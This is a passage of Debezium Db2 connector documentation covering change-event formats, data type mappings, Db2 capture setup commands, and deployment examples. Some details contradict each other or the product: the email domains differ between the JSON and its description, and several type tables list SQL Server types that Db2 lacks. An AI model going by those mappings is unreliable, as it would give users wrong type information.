\"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"after\": { \/\/ <2>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729995937,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000ac0:0002\",\n \"commit_lsn\": \"00000027:00000ac0:0007\",\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1559729998706 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, note that the `EMAIL` value is `john.doe@example.com`.\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `EMAIL` value is now `noreply@example.com`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure contains the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has different LSNs. You can use this information to compare this event to other events to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-db2-connector}#db2-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row.\n====\n\n[[db2-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The event value `payload` in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559730445243,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000db0:0005\",\n \"commit_lsn\": \"00000027:00000db0:0007\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1559730450205 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and LSN field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nDb2 connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[db2-tombstone-events]]\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s Db2 connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-db2-connectors-map-data-types\n\/\/ Title: How {prodname} Db2 connectors map data types\n[[db2-data-types]]\n== Data type mappings\n\nDb2's data types are described in https:\/\/www.ibm.com\/support\/knowledgecenter\/en\/SSEPGG_11.5.0\/com.ibm.db2.luw.sql.ref.doc\/doc\/r0008483.html[Db2 SQL Data Types].\n\nThe Db2 connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Db2 data type of the column. This section describes these mappings.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:db2-basic-types[]\n* xref:db2-temporal-types[]\n* xref:db2-timestamp-types[]\n* xref:db2-decimal-types[]\n\nendif::product[]\n\n[id=\"db2-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps each of the Db2 data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Db2 basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|Only snapshots can be taken from tables with BOOLEAN type columns. Currently SQL Replication on Db2 does not support BOOLEAN, so Debezium can not perform CDC on those tables. Consider using a different type.\n\n\n|`BIGINT`\n|`INT64`\n|n\/a\n\n|`BINARY`\n|`BYTES`\n|n\/a\n\n|`BLOB`\n|`BYTES`\n|n\/a\n\n|`CHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`CLOB`\n|`STRING`\n|n\/a\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nString representation of a timestamp without timezone information\n\n|`DECFLOAT`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DECIMAL`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DBCLOB`\n|`STRING`\n|n\/a\n\n|`DOUBLE`\n|`FLOAT64`\n|n\/a\n\n|`INTEGER`\n|`INT32`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`SMALLINT`\n|`INT16`\n|n\/a\n\n|`TIME`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nString representation of a time without timezone information\n\n|`TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nString representation of a timestamp without timezone information\n\n|`VARBINARY`\n|`BYTES`\n|n\/a\n\n|`VARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`VARGRAPHIC`\n|`STRING`\n|n\/a\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nString representation of an XML document\n|===\n\nIf present, a column's default value is propagated to the corresponding field's Kafka Connect schema. Change events contain the field's default value unless an explicit column value had been given. Consequently, there is rarely a need to obtain the default value from the schema.\nifdef::community[]\nPassing the default value helps satisfy compatibility rules when {link-prefix}:{link-avro-serialization}[using Avro] as the serialization format together with the Confluent schema registry.\nendif::community[]\n\n[[db2-temporal-types]]\n=== Temporal types\n\nOther than Db2's `DATETIMEOFFSET` data type, which contains time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:\n\n* xref:db2-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:db2-time-precision-mode-connect[`time.precision.mode=connect`]\n\n[[db2-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` configuration property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. This ensures that events _exactly_ represent the values in the database.\n\n.Mappings when `time.precision.mode` is `adaptive`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIME(7)`\n|`INT64`\n|`io.debezium.time.NanoTime` +\n +\nRepresents the number of nanoseconds past midnight, and does not include timezone information.\n\n|`DATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(7)`\n|`INT64`\n|`io.debezium.time.NanoTimestamp` +\n +\nRepresents the number of nanoseconds past the epoch, and does not include timezone information.\n|===\n\n[[db2-time-precision-mode-connect]]\n.`time.precision.mode=connect`\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. However, since Db2 supports tenth of a microsecond precision, the events generated by a connector with the `connect` time precision *results in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.\n\n.Mappings when `time.precision.mode` is `connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|`DATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n|===\n\n[[db2-timestamp-types]]\n=== Timestamp types\n\nThe `DATETIME`, `SMALLDATETIME` and `DATETIME2` types represent a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `DATETIME2` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\".\n\nThe timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\n[[db2-decimal-types]]\n=== Decimal types\n\n[cols=\"27%a,18%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`NUMERIC[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`DECIMAL[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`SMALLMONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point iss shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`MONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-up-db2-to-run-a-debezium-connector\n\/\/ Title: Setting up Db2 to run a {prodname} connector\n[[setting-up-db2]]\n== Set up\n\nA database administrator must put tables into capture mode before you can run a {prodname} Db2 connector to capture changes that are committed to a Db2 database. To put tables into capture mode, {prodname} provides a set of user-defined functions (UDFs) for your convenience. The procedure here shows how to install and run these management UDFs. Alternatively, you can run Db2 control commands to put tables into capture mode.\n\nThis procedure assumes that you are logged in as the `db2instl` user, which is the default instance and user name when using the Db2 docker container image.\n\n.Prerequisites\n\n* On the machine on which Db2 is running, the content in `debezium-connector-db2\/src\/test\/docker\/db2-cdc-docker` is available in the `$HOME\/asncdctools\/src` directory.\n\n.Procedure\n\n. Compile the {prodname} management UDFs on the Db2 server host by using the `bldrtn`\ncommand provided with Db2:\n+\n[source,shell]\n----\ncd $HOME\/asncdctools\/src\n----\n+\n[source,shell]\n----\n.\/bldrtn asncdc\n----\n\n. Start the database if it is not already running. Replace `DB_NAME` with the name of the database that you want {prodname} to connect to.\n+\n[source,shell]\n----\ndb2 start db DB_NAME\n----\n\n. Ensure that JDBC can read the Db2 metadata catalog:\n+\n[source,shell]\n----\ncd $HOME\/sqllib\/bnd\n----\n+\n[source,shell]\n----\ndb2 bind db2schema.bnd blocking all grant public sqlerror continue\n----\n\n. Ensure that the database was recently backed-up. The ASN agents must have a recent starting point to read from. If you need to perform a backup, run the following commands, which prune the data so that only the most recent version is available. If you do not need to retain the older versions of the data, specify `dev\/null` for the backup location.\n\n.. Back up the database. Replace `DB_NAME` and `BACK_UP_LOCATION` with appropriate values:\n+\n[source,shell]\n----\ndb2 backup db DB_NAME to BACK_UP_LOCATION\n----\n\n.. Restart the database:\n+\n[source,shell]\n----\ndb2 restart db DB_NAME\n----\n\n. Connect to the database to install the {prodname} management UDFs. It is assumed that you are logged in as the `db2instl` user so the UDFs should be installed on the `db2inst1` user.\n+\n[source,shell]\n----\ndb2 connect to DB_NAME\n----\n\n. Copy the {prodname} management UDFs and set permissions for them:\n+\n[source,shell]\n----\ncp $HOME\/asncdctools\/src\/asncdc $HOME\/sqllib\/function\n----\n+\n[source,shell]\n----\nchmod 777 $HOME\/sqllib\/function\n----\n\n. Enable the {prodname} UDF that starts and stops the ASN capture agent:\n+\n[source,shell]\n----\ndb2 -tvmf $HOME\/asncdctools\/src\/asncdc_UDF.sql\n----\n\n. Create the ASN control tables:\n+\n[source,shell]\n----\n$ db2 -tvmf $HOME\/asncdctools\/src\/asncdctables.sql\n----\n\n. Enable the {prodname} UDF that adds tables to capture mode and removes tables from capture mode:\n+\n[source,shell]\n----\n$ db2 -tvmf $HOME\/asncdctools\/src\/asncdcaddremove.sql\n----\n+\nAfter you set up the Db2 server, use the UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value in which case you use the SQL `VALUE` statement to invoke them. For other UDFs, use the SQL `CALL` statement.\n\n. Start the ASN agent:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('start','asncdc');\n----\n\n. Put tables into capture mode. Invoke the following statement for each table that you want to put into capture. Replace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode:\n+\n[source,sql]\n----\nCALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');\n----\n\n. Reinitialize the ASN service:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');\n----\n\n.Additional resource\n\n{link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[Reference table for {prodname} Db2 management UDFs]\n\n\/\/ Type:concept\n\/\/ ModuleID: how-the-db2-capture-agent-configuration\n=== How the Db2 capture agent configuration affects latency, server load, and performance\n\nWhen a database administrator enables change data capture for a source table, the capture agent begins to run.\nThe agent reads new change event records from the transaction log and replicates the event records to a capture table.\nBetween the time that a change is committed in the source table, and the time that the change appears in the corresponding change table, there is always a small latency interval.\nThis latency interval represents a gap between when changes occur in the source table and when they become available for {prodname} to stream to Kafka.\n\nIdeally, for applications that must respond quickly to changes in data, you want to maintain close synchronization between the source and capture tables.\nYou might imagine that running the capture agent to continuously process change events as rapidly as possible might result in increased throughput and reduced latency --\npopulating change tables with new event records as soon as possible after the events occur, in near real time.\nHowever, this is not necessarily the case.\nThere is a performance penalty to pay in the pursuit of more immediate synchronization.\nEach time that the change agent queries the database for new event records, it increases the CPU load on the database host.\nThe additional load on the server can have a negative effect on overall database performance, and potentially reduce transaction efficiency, especially during times of peak database use.\n\nIt's important to monitor database metrics so that you know if the database reaches the point where the server can no longer support the capture agent's level of activity.\nIf you notice performance problems, there are Db2 capture agent settings that you can modify to help balance the overall CPU load on the database host with a tolerable degree of latency.\n\n.Capture agent tuning parameters\nOn Db2, the `IBMSNAP_CAPPARMS` table contains parameters that control the operations of the capture agent.\nShould you experience performance issues on Db2, you can configure the capture process by adjusting the values for these parameters.\nSpecifying the exact values to set for these parameters is beyond the scope of this documentation.\n\nThere are multiple capture agent parameters in the `IBMSNAP_CAPPARMS` table.\nThe following parameters are the most significant for modifying capture agent behavior for use with the {prodname} Db2 connector.\n\n`COMMIT_INTERVAL`:: Specifies the number of seconds that the capture agent waits to commit data to the change data tables.\nA lower value results in the change table receiving a greater number of commits in a shorter time period (lower latency).\nSpecify a larger commit interval results in batch processing of the replication workload.\n\n`SLEEP_INTERVAL`:: Specifies the number of seconds that the capture agent waits to start a new commit cycle after it reaches the end of the active transaction log.\nHigher values reduce the number of commit cycles\n\n.Additional resources\n* For more information about capture agent parameters, see the documentation for your Db2 database.\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-debezium-db2-connectors\n\/\/ Title: Deploying {prodname} Db2 connectors\n[[db2-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\n\nWith https:\/\/zookeeper.apache.org[Zookeeper], http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Db2 connector are:\n\n. Download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-db2\/{debezium-version}\/debezium-connector-db2-{debezium-version}-plugin.tar.gz[connector's plug-in archive].\n\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. Obtain the link:https:\/\/www.ibm.com\/support\/pages\/db2-jdbc-driver-versions-and-downloads[JDBC driver for Db2].\n. Add the JDBC driver JAR file to the directory with the {prodname} Db2 connector JARs.\n. {link-prefix}:{link-db2-connector}#db2-adding-connector-configuration[Configure the connector and add the configuration to your Kafka Connect cluster.]\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Db2 connector already installed and ready to run.\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nTo deploy a {prodname} Db2 connector, install the {prodname} Db2 connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. Details are in the following topics:\n\n* xref:steps-for-installing-debezium-db2-connectors[]\n* xref:debezium-db2-connector-configuration-example[]\n* xref:adding-debezium-db2-connector-configuration-to-kafka-connect[]\n* xref:descriptions-of-debezium-db2-connector-configuration-properties[]\n\n\/\/ Type: concept\n[id=\"steps-for-installing-debezium-db2-connectors\"]\n=== Steps for installing {prodname} Db2 connectors\n\nTo install the Db2 connector, follow the procedures in {LinkDebeziumInstallOpenShift}[{NameDebeziumInstallOpenShift}]. The main steps are:\n\n. {LinkDebeziumUserGuide}#setting-up-db2-to-run-a-debezium-connector[Set up Db2 to run a {prodname} connector]. This enables Db2 replication to expose change-data for tables that are in capture mode.\n\n. Use link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat AMQ Streams] to set up Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.\n\n. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[Db2 connector].\n\n. Extract the files into your Kafka Connect environment.\n. Add the plug-in's parent directory to your Kafka Connect `plugin.path`, for example:\n+\n[source]\n----\nplugin.path=\/kafka\/connect\n----\n+\nThe above example assumes that you extracted the {prodname} Db2 connector to the `\/kafka\/connect\/{prodname}-connector-db2` path.\n\n. Restart your Kafka Connect process to ensure that the new JAR files are picked up.\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-configuration-example\n\/\/ Title: {prodname} Db2 connector configuration example\n[[db2-example-configuration]]\n=== Connector configuration example\n\nifdef::community[]\n\n[[db2-example]]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure the {prodname} Db2 connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"db2-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.db2.Db2Connector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"50000\", \/\/ <4>\n \"database.user\": \"db2inst1\", \/\/ <5>\n \"database.password\": \"Password!\", \/\/ <6>\n \"database.dbname\": \"mydatabase\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"table.include.list\": \"MYSCHEMA.CUSTOMERS\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\" \/\/ <11>\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Db2 connector class.\n<3> The address of the Db2 instance.\n<4> The port number of the Db2 instance.\n<5> The name of the Db2 user.\n<6> The password for the Db2 user.\n<7> The name of the database to capture changes from.\n<8> The logical name of the Db2 instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n<9> A list of all tables whose changes {prodname} should capture.\n<10> The list of Kafka brokers that this connector uses to write and recover DDL statements to the database history topic.\n<11> The name of the database history topic where the connector writes and recovers DDL statements. This topic is for internal use only and should not be used by consumers.\n\nendif::community[]\n\nifdef::product[]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure a {prodname} Db2 connector in a `.yaml` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels: strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.db2.Db2Connector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: 192.168.99.100 \/\/ <4>\n database.port: 50000\n database.user: db2inst1\n database.password: Password!\n database.dbname: mydatabase\n database.server.name: fullfillment \/\/ <5>\n database.include.list: public.inventory \/\/ <6>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the address of the Db2 instance.\n\n|5\n|The logical name of the Db2 instance\/cluster, which forms a namespace and is used in the names of the Kafka topics to which the connector writes, the names of Kafka Connect schemas, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n\n|6\n|Changes in only the `public.inventory` database are captured.\n\n|===\n\nendif::product[]\n\nSee the {link-prefix}:{link-db2-connector}#db2-connector-properties[complete list of connector properties] that you can specify in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts one connector task that connects to the Db2 database, reads change-data tables for tables in capture mode, and streams change event records to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-db2-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Db2 connector configuration to Kafka Connect\n[[db2-adding-connector-configuration]]\n=== Adding connector configuration\n\nifdef::community[]\nTo start running a Db2 connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* The {link-prefix}:{link-db2-connector}#setting-up-db2-to-run-a-debezium-connector[Db2 replication] is enabled to expose change-data for tables that are in capture mode\n\n* The Db2 connector is installed.\n\n.Procedure\n\n. Create a configuration for the Db2 connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} Db2 connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment.\n\n.Prerequisites\n\n* Podman or Docker is installed and you have sufficient rights to create and manage containers.\n* You installed the {prodname} Db2 connector archive.\n\n.Procedure\n\n. Extract the {prodname} Db2 connector archive to create a directory structure for the connector plug-in, for example:\n+\n[subs=+macros]\n----\npass:quotes[*tree .\/my-plugins\/*]\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-db2\n\u2502 \u251c\u2500\u2500 ...\n----\n\n. Create and publish a custom image for running your {prodname} connector:\n\n.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:\n+\n[subs=\"+macros,+attributes\"]\n----\nFROM {DockerKafkaConnect}\nUSER root:root\npass:quotes[COPY _.\/my-plugins\/_ \/opt\/kafka\/plugins\/]\nUSER 1001\n----\n+\nBefore Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `\/opt\/kafka\/plugins` directory.\n\n.. Build the container image. For example, if you saved the `Dockerfile` that you created in the previous step as `debezium-container-for-db2`, and if the `Dockerfile` is in the current directory, then you would run the following command:\n+\n`podman build -t debezium-container-for-db2:latest .`\n\n.. Push your custom image to your container registry, for example:\n+\n`podman push debezium-container-for-db2:latest`\n\n.. Point to the new container image. Do one of the following:\n+\n* Edit the `spec.image` property of the `KafkaConnector` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnector\nmetadata:\n name: my-connect-cluster\nspec:\n #...\n image: debezium-container-for-db2\n----\n+\n* In the `install\/cluster-operator\/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file you must apply it to your OpenShift cluster.\n\n. Create a `KafkaConnector` custom resource that defines your {prodname} Db2 connector instance. See {LinkDebeziumUserGuide}#debezium-db2-connector-configuration-example[the connector configuration example].\n\n. Apply the connector instance, for example:\n+\n`oc apply -f inventory-connector.yaml`\n+\nThis registers `inventory-connector` and the connector starts to run against the `inventory` database.\n\n. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, 